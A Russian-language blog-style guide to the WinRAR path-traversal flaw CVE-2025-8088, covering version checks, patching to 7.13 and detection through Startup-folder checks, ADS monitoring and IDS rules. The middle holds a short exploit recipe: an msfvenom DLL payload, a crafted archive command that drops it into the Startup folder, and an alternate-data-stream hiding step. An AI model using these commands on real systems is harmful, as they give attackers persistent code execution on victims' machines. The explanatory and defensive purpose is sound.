
Увлекательное руководство по обнаружению, исправлению и защите WinRAR CVE-2025-8088 с практическим хакерским подходом.
WinRAR — пыльная классика, которая стоит у всех, но никто не обновляет — только что получил критический zero-day: CVE-2025-8088.
CISA даже внесла его в свой каталог известных эксплуатируемых уязвимостей с крайним сроком устранения до 2 сентября 2025. Это не теория — это реальная угроза.
..\Startup\evil.dllЗатрагивает: WinRAR для Windows (≤7.12), UnRAR.dll, Portable UnRAR Безопасны: сборки для Linux, Unix, Android.
Прежде чем паниковать или притворяться хакером, проверьте свою версию.
Справка → О программе WinRARwinget list WinRAR
(или запустите winrar.exe из папки установки)
UnRAR.dll → Свойства → Подробно.Когда я начал писать это, у меня была версия 7.10 — да, ripe for the picking 🗿🐔🍗.
Справка → О программе WinRAR → должно быть 7.13 или выше.UnRAR.dll в зависимых инструментах, если таковые имеются.WinRAR не обновляется автоматически — поставьте напоминание в календаре, не становитесь статичной мишенью.
PS: Не обращайте внимания на мой крутой обоины — надо было немного похвастаться! 😏
%TEMP% и папках автозагрузки.⚠ Отказ от ответственности: Это только для образовательного и авторизованного тестирования безопасности. Не ведите себя как гремлины 🗿.
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
Бум — evil.dll оказывается в папке автозагрузки. Следующая перезагрузка? Привет, calc.exe.
Установите заплатку → WinRAR 7.13+
Ищите подозрительные .dll или .lnk в:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%Мониторинг ADS:
streams.exe -s C:\
Правила IDS/IPS: отслеживать RAR с последовательностями ..\.
Плагины Nessus/Qualys уже доступны.
Это была не уязвимость «когда-нибудь» — она была вооружена до публичного раскрытия. Если вы всё ещё сидите на 7.10 (как я, когда писал это) — ставьте патч сейчас. Если вы на стороне красной команды, рассматривайте это как пример того, как старые инструменты становятся новыми векторами атак.